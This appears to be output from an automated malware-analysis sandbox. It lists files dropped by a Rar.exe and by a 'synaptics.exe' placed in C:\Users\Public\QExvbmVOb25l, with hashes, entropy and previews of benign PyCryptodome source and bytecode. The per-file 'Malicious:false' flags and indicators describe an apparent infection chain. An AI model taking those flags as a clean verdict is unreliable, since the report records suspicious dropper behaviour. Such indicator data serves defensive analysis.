                                                                                                                                                                                      SHA-512:B5472537D636DB5D8EE6BADEA791816C4E6B052D899AB443D8BC5CB5E4721B1C1B79160F114FEC8A289578566084D3B5C8E7E0385066A331FC9864465BBD0541
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, Optional..from typing_extensions import Protocol..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class XOF(Protocol):.. def read(self, len: int) -> bytes: .......def import_public_key(encoded: bytes) -> EccKey: .....def import_private_key(encoded: bytes) -> EccKey: .......class EdDSASigScheme(object):.... def __init__(self, key: EccKey, context: bytes) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_or_hash: Union[bytes, Hash, XOF]) -> bytes: ..... def verify(self, msg_or_hash: Union[bytes, Hash, XOF], signature: bytes) -> None: .......def new(key: EccKey, mode: str, context: Optional[bytes]=None) -> EdDSASigScheme: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9088
                                                                                                                                                                                      Entropy (8bit):5.053423261865839
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/ISM97UQFA2CEkoA3KhNzYaomc:0rskrs9VqdM97UQFAM+go
                                                                                                                                                                                      MD5:8DD798B530CC55801BC2744A469CD46F
                                                                                                                                                                                      SHA1:70FBA1485270D0F63B5C676B2AFC0CCAF606A06F
                                                                                                                                                                                      SHA-256:2E59C1BB1C7A738F51343213C94F49503CB91BAD07D906272FA44BCC1CEDD8FA
                                                                                                                                                                                      SHA-512:82DBDDC02494535B90B4388ED6698CBC4F90A0589B32A5D693C8134BF682007896E47C0055C222FE89260AF21CE8E0D4F639CEE61F02677893BD82937C310173
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):581
                                                                                                                                                                                      Entropy (8bit):5.067047688730709
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLRwlbQgA85A3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+LRwlbf
                                                                                                                                                                                      MD5:DC28B90A844CBE3BCE2F14FBAD339B51
                                                                                                                                                                                      SHA1:920E136B27895D970DE44FC61B00180D4DB686F2
                                                                                                                                                                                      SHA-256:E2CE13431A88DD8206D23EF6C0E1935B61795A97166309CA8FBED78D68AF6FED
                                                                                                                                                                                      SHA-512:BC0C4D5F5FD2DB593B00144EB4DDC1BEE12B71CA399CC08C25F00C11B0463404B64FD20F2A13FC91B83ED7DE03E132AA1E968D12373D96E74BFDA0C4CA68A105
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .......def _EMSA_PKCS1_V1_5_ENCODE(msg_hash: Hash, emLen: int, with_hash_parameters: Optional[bool]=True) -> bytes: .......def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13970
                                                                                                                                                                                      Entropy (8bit):4.861341757640308
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:9qrskrs9t3q/IFlYlgXJ0rcUfsOg58VFJbAVFtn3sxliqu8:0rskrs9Vq+GgXirHfsv8VEVP8/RL
                                                                                                                                                                                      MD5:2A9F316CD479BB56AE101218E1B96816
                                                                                                                                                                                      SHA1:3E63E6B6F8D771082C7DFF39B827BBB55BDA5CA9
                                                                                                                                                                                      SHA-256:47736BFBB2762DEA089BE962E283E1E1155C51A2280C1839F5494B5BA9B72973
                                                                                                                                                                                      SHA-512:C0F595025D3C77DB448177FFFAEC7FFA82FC021F08A351E00644CCA0F1006B1D68B4D6D567D242D56040CB7180D8B69DDD592C9ED85D653C34F8CCA026DCB84D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1071
                                                                                                                                                                                      Entropy (8bit):5.102431129383602
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LAu8Bo633XfD7:Jy+1o3xf1ov2GovRLAVnPf
                                                                                                                                                                                      MD5:505820D514B9F7B2244301F2DC317034
                                                                                                                                                                                      SHA1:A90CFF03252A14134E286EB646ED62D9B82E076D
                                                                                                                                                                                      SHA-256:0A62FC61A9C9A60FDADEFBCF20BCAD59140D16C09E4485A28820F9D14B156ACE
                                                                                                                                                                                      SHA-512:B5A534C52FC07BC8E0A145F628857381F7A8F4570459A83D3DFD4BFB0A6BD526465C1291CB8F2714F5B8A02D12A3403FBEC6B666BE49608B87D3CA80E10D8EC8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> None: .........MGF1 : MaskFunction..def _EMSA_PSS_ENCODE(mhash: Hash, emBits: int, randFunc: RndFunction, mgf:MaskFunction, sLen: int) -> str: .....def _EMSA_PSS_VERIFY(mhash: Hash, em: str, emBits: int, mgf: MaskFunction, sLen: int) -> None: .....def new(rsa_key: RsaKey, *
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3292
                                                                                                                                                                                      Entropy (8bit):5.003098854081704
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MRwEIB0jcQHMsvI/S3oCFGAZUqjZibFduSmZpoRE3bpJ5U:MRwfFQHvo2Uq1cFYSYpCE3bpJ5U
                                                                                                                                                                                      MD5:25E5852A52182CBF645AC075BDE04C8E
                                                                                                                                                                                      SHA1:5431574C5E607B91EE33D90D2DBD52E6634622A5
                                                                                                                                                                                      SHA-256:E0D9B91A882D3986EF288761C85527F658E552B9A48B02AD630896A10B155F9B
                                                                                                                                                                                      SHA-512:8AE1F5A17386A33B2C6E4D9360C2CCFEA10549DCDDAA920919B12C8FF4975AAA536E759C5C98885E9863194381B3C9B1E40D935C2562C80786CC9EEAE238A4BD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: ascii -*-..#..# Util/Counter.py : Fast counter for use with CTR-mode ciphers..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):295
                                                                                                                                                                                      Entropy (8bit):4.705947008789207
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:1REYBr0hxrMND0R2D9F6s/2F62LMJteOFr2gCUA2gA1MJFuJry:1REYBr0DI1RFF2FDLMJzZ2gCn2gA1gM4
                                                                                                                                                                                      MD5:48844D3840F12D7CC253481AEB936730
                                                                                                                                                                                      SHA1:2329321B884361FF52CD1E79D4ECD3ABD2C08309
                                                                                                                                                                                      SHA-256:7A86661370C3B894AEB4EDAD8755466DE52226588608A530F63F3E3379585AD0
                                                                                                                                                                                      SHA-512:06990D253057568DB8B16CAFF5599CD48FDE3100B5193213BD250BD1797D11F2A62C00D493AAC5CA60CD557514B3AC543454D9D50991B9EEAA735B3D6E3A7150
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Optional, Union, Dict....def new(nbits: int, prefix: Optional[bytes]=..., suffix: Optional[bytes]=..., initial_value: Optional[int]=1,.. little_endian: Optional[bool]=False, allow_wraparound: Optional[bool]=False) -> \.. Dict[str, Union[int, bytes, bool]]: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4421
                                                                                                                                                                                      Entropy (8bit):5.191112640865006
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:e1tDqrYJALrYJHdt3EHGuI2gHdYUI1e+GJF37gR8C91/ErvyGAhQyAk:e1Vqrskrs9t3q/ILxF379aGyQyh
                                                                                                                                                                                      MD5:FBF391FD249DDBB1C32502AC42999B5D
                                                                                                                                                                                      SHA1:9559F22269BBE2A0F918705DED635B8CC666DD10
                                                                                                                                                                                      SHA-256:A04416E7AA698FFFC0301EE284720426B69E9A3BCB2A0C7E954A054698C29405
                                                                                                                                                                                      SHA-512:4241AEF302C010640C2FA86D92F2EE7EA34A865F759D14C02024F62A3452C593C0BCCABFE46043E879EB1CD73A290F85C0DD106A294684F628C100EA06382DF9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# Util/Padding.py : Functions to manage padding..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SH
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):243
                                                                                                                                                                                      Entropy (8bit):4.823438083026704
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:1REYB0yqDLWJJni6Co6sRGcp5gUeQ/6sRGcp5/:1REYBkDyHZHRGe5VeQPRGe5/
                                                                                                                                                                                      MD5:72AE5A92A5B5373240F3184324E84F6B
                                                                                                                                                                                      SHA1:976AEA0ED87A3C086D068AE560FDB2FFCD591676
                                                                                                                                                                                      SHA-256:ED464B7B39D2481D2C4DE1FF908308ADF7F035B21B3F7A242E469F1BD173DEF6
                                                                                                                                                                                      SHA-512:27C15B7D76E180E1B65D566D8225C3661E78854515C9716A645C5F62E444B5A90AB61DDF92677B9C4A1276921711C281C814CAC60FA6D0BFC76A7716E4124613
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Optional....__all__ = [ 'pad', 'unpad' ]....def pad(data_to_pad: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: .....def unpad(padded_data: bytes, block_size: int, style: Optional[str]='pkcs7') -> bytes: ...
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21578
                                                                                                                                                                                      Entropy (8bit):4.591349548627808
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:aPe4cRum4V+EE2tKm/8MboR6U/6LcleM6s4riu6gvZGVSRq67:DAfHQgRGVe37
                                                                                                                                                                                      MD5:73AEDFB55D3A90F08A29CC5D0AB7E623
                                                                                                                                                                                      SHA1:D576725EC2571123AFE056369B58063BFB9D7724
                                                                                                                                                                                      SHA-256:DFDB8CD578E00E485AD2070F24A3CFD7B0E75C972EBA73912B0BB59D8D67193B
                                                                                                                                                                                      SHA-512:BB63BA3D20FC92A942F16C35E0128AEB2810310F75778FD6218D037D40AFFFCF3E19FFADE08882C0EC781548EACB5588A5B5A964E96FC5753CF44A9053EAADFD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# rfc1751.py : Converts between 128-bit strings and a human-readable..# sequence of words, as defined in RFC1751: "A Convention for..# Human-Readable 128-bit Keys", by Daniel L. McDonald...#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DA
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):166
                                                                                                                                                                                      Entropy (8bit):4.7074966574817525
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:1REvgBoGvFbT/uopMLUXvcgEsbd7RC7L6yuCnhlxEmu5gv:1REYBDFbaoiCEsdsPVua5EP5gv
                                                                                                                                                                                      MD5:0DE296D8A8547E04D6926C50733B2BE8
                                                                                                                                                                                      SHA1:00E9FDFFF578A121326A68BDDAD8C135CEDAD52D
                                                                                                                                                                                      SHA-256:76B2DA534877F2226EA2D41EC36651EA9B0344F541B7B127DD6C51994F90F2C5
                                                                                                                                                                                      SHA-512:1E6630A95E807139497202AB681F9B77974C90723DFFDADD1E100B4802B0D677DD4D2A3AC65A8ECF700AC6E1CC8BB353C2EBFFBBEE0AFB1C6ACA4C0D78C72A9E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Dict, List....binary: Dict[int, str]..wordlist: List[str]....def key_to_english(key: bytes) -> str: .....def english_to_key(s: str) -> bytes: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1968
                                                                                                                                                                                      Entropy (8bit):4.96168817055765
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:KIB0jcQHMsvI/S3oCFxSawf+bBVZ4YuOr2:dFQHvoEQ+tvY
                                                                                                                                                                                      MD5:CCD084ED08A6E3D89DC9B9ECD62D524D
                                                                                                                                                                                      SHA1:439DDFB5344BA4510F46A29913E7764824094696
                                                                                                                                                                                      SHA-256:98831540F44AB7137A0DE53A8A8C818DEC32F0DC9C2731912424AECCE04C07FA
                                                                                                                                                                                      SHA-512:354925C7E294A4FEA723AEBE1F618EF8DF1A82FDE95B578C86AB8DC21473E0719832E05D8971B537633631AAF62A2C6885A0D2F1F92A584C93F96F76D8204867
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2336
                                                                                                                                                                                      Entropy (8bit):5.4417595091627735
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NSEbQJrnAeKJdRXlkNyiFsx3miW7WlxeKbNRT7ytqmcQg:bbQJDAeqzHo2W6re637wg
                                                                                                                                                                                      MD5:3706D32026C84A67F20EAA92C2C395AB
                                                                                                                                                                                      SHA1:EDBD660872BDB8BB54F86F94521A94B07D778A1E
                                                                                                                                                                                      SHA-256:51ABB579BC8B05AF83B5FFA799F8DE0B013B03F991673C53D8146DCE11454112
                                                                                                                                                                                      SHA-512:C8E16EBEEE79A8162288011421AFA5AED305F696E4382238A26CA692D918C295756BCF84204F8E0E10B85D8B764EB40C39AD6EF945F108351917B6A7B2571AD4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fE........................@...s(...d.d.g.Z.d.d.l.T.d.d.d...Z.d.d.d...Z.d.S.)...pad..unpad.....)...*..pkcs7c....................C...s....|.t.|...|.....}.|.d.k.r.t.|...|...}.|.|...S.|.d.k.r*t.d...|.d.....t.|.....}.|.|...S.|.d.k.r>t.d...t.d...|.d.......}.|.|...S.t.d.....).a....Apply standard padding... Args:. data_to_pad (byte string):. The data that needs to be padded.. block_size (integer):. The block boundary to use for padding. The output length is guaranteed. to be a multiple of :data:`block_size`.. style (string):. Padding algorithm. It can be *'pkcs7'* (default), *'iso7816'* or *'x923'*... Return:. byte string : the original data with the appropriate padding added at the end.. r......x923r...........iso7816......Unknown padding style)...len..bchr..ValueError).Z.data_to_pad..block_size..style..padding_len..padding..r.....EC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\Padding.pyr....'...s...............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1107
                                                                                                                                                                                      Entropy (8bit):4.873031507150908
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:NKUilE4ApU2gWfri+RHvEIO4oFaQvuYjVrGivBlOh2/K:NFilbASgf++BcD4YaQVprGGBgR
                                                                                                                                                                                      MD5:A207A1F466802102025E63FBA5B0E502
                                                                                                                                                                                      SHA1:83C8865EEDF0EB6EAD6379476F122F31DB5D91EA
                                                                                                                                                                                      SHA-256:2B0E5521DB488A45EE693FE27BDDB0184501FA891F7F5E0F99F0E59D6FD2EBBF
                                                                                                                                                                                      SHA-512:BB20B789CC9276E71C7011DAC39A982B5838A5EF40930CCA0E66B4CD6DDA9BB41A8EDE16D4871B56940BC5B7C6707E3EEF5C3FBB0B644F0A4FCC28849AB1FCDB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.Z.g.d...Z.d.S.).a[...Miscellaneous modules..Contains useful modules that don't belong into any of the.other Crypto.* subpackages...======================== =============================================.Module Description.======================== =============================================.`Crypto.Util.number` Number-theoretic functions (primality testing, etc.).`Crypto.Util.Counter` Fast counter functions for CTR cipher modes..`Crypto.Util.RFC1751` Converts between 128-bit keys and human-readable. strings of words..`Crypto.Util.asn1` Minimal support for ASN.1 DER encoding.`Crypto.Util.Padding` Set of functions for adding and removing padding..======================== =============================================..:undocumented: _galois, _number_new, cpuid, py3compat, _raw_api.).Z.RFC1751..numberZ.strxorZ.asn1..CounterZ.PaddingN)...__doc__..__all__
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):694
                                                                                                                                                                                      Entropy (8bit):4.5930397087553985
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:Cg/Q4UlabXgAin19S07ov8Vlh2mv99J+di+ymIm+l:NTUliQAin19SkXh2+J+dBIL
                                                                                                                                                                                      MD5:2FFB368FB1F4936753669BC58C1D2F11
                                                                                                                                                                                      SHA1:E41F8637159EDF678354AD635978BF7EB7B7B21A
                                                                                                                                                                                      SHA-256:175F5DF25BEAB5CDE0EEB6AF705B0F991C3BF243FECCF63B9051A6B5C1D405F7
                                                                                                                                                                                      SHA-512:2B30C91B8B9E7DAAAF30804A9C8E1547F5CD9FC0CF21CD1817C333C224C9C52FB423C7C7CAA5B5D25AD9325870A314E4ACC9A6B14C506C665F772E5F63D91B66
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s*...d.d.l.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_libz.Crypto.Util._cpuid_cz.. int have_aes_ni(void);. int have_clmul(void);. c....................C........t.....S...N)..._raw_cpuid_lib..have_aes_ni..r....r.....KC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\_cpu_features.pyr....)..........r....c....................C...r....r....).r......have_clmulr....r....r....r....r....-...r....r....N)...Crypto.Util._raw_apir....r....r....r....r....r....r....r......<module>....s................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):853
                                                                                                                                                                                      Entropy (8bit):5.333276165807784
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:NrLuapeA2HBZ8SlwC8ES3OyHzIh28M/3k:NrLu4YZkCkeyHzk8/0
                                                                                                                                                                                      MD5:FFF6EC453349F44DAD87C1FAC87687D5
                                                                                                                                                                                      SHA1:E2EA2906CDCF67A353F0B707036846B6EBB36AAE
                                                                                                                                                                                      SHA-256:8AEBC720460E9386513C4077B960EDF54EB151CB0683F106D7029F9B6315F5E1
                                                                                                                                                                                      SHA-512:A6228767611F37DF3B62CD375E3DCA2A2F7B4DE3760F14CAC27BF2AD5C48B8ABDA1DF54AFA950375D5CD14051CDF6054E00CA130FA4F98D24C9D84A97823A85B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.d.l.Z.d.d...Z.d.S.)......Nc....................C...sd...|.d...d.k.r.t.d.....t.|.d.d.......|.g...}.t.j...t.j...t.....\.}.}.t.j...|.d...}.t.j.j.|.g.|...R...S.).a....Return the complete file name for the module.. dir_comps : list of string. The list of directory names in the PyCryptodome package.. The first element must be "Crypto"... filename : string. The filename (inclusing extension) in the target directory.. r....Z.Cryptoz)Only available for modules under 'Crypto'.....Nz...)...ValueError..list..os..path..split..abspath..__file__..join)...dir_comps..filenameZ.util_lib.._Z.root_lib..r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Util\_file_system.py..pycryptodome_filename"...s................r....).r....r....r....r....r....r......<module>....s........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8730
                                                                                                                                                                                      Entropy (8bit):5.205858648047069
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:mfhLSEONC31/QtcU4/GPCenzp7Qb+RQrBIQIu7XNNHD0yXNvjB2IatSxB/dbJg1d:MhmEONC31ItcUGGPCenzp7Qb+RQrBIQO
                                                                                                                                                                                      MD5:6B937059E98D26DC3EAF077D6294913D
                                                                                                                                                                                      SHA1:1AFC6C5E8D9CB617D705578DC823B082B0232B54
                                                                                                                                                                                      SHA-256:90AE5500B3386456BAC3DB43961FB00E24C22AAD133C268486CDB069CC7915F7
                                                                                                                                                                                      SHA-512:7EA086DA739F93EFF55DA25D9A49321A78BA4375E3F425F2F98C3FCBF40F7EFE5E29AEF3C895E37BB0FFC1830100E781DA1A8940C5459CAE7FA3147C3460E4F3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
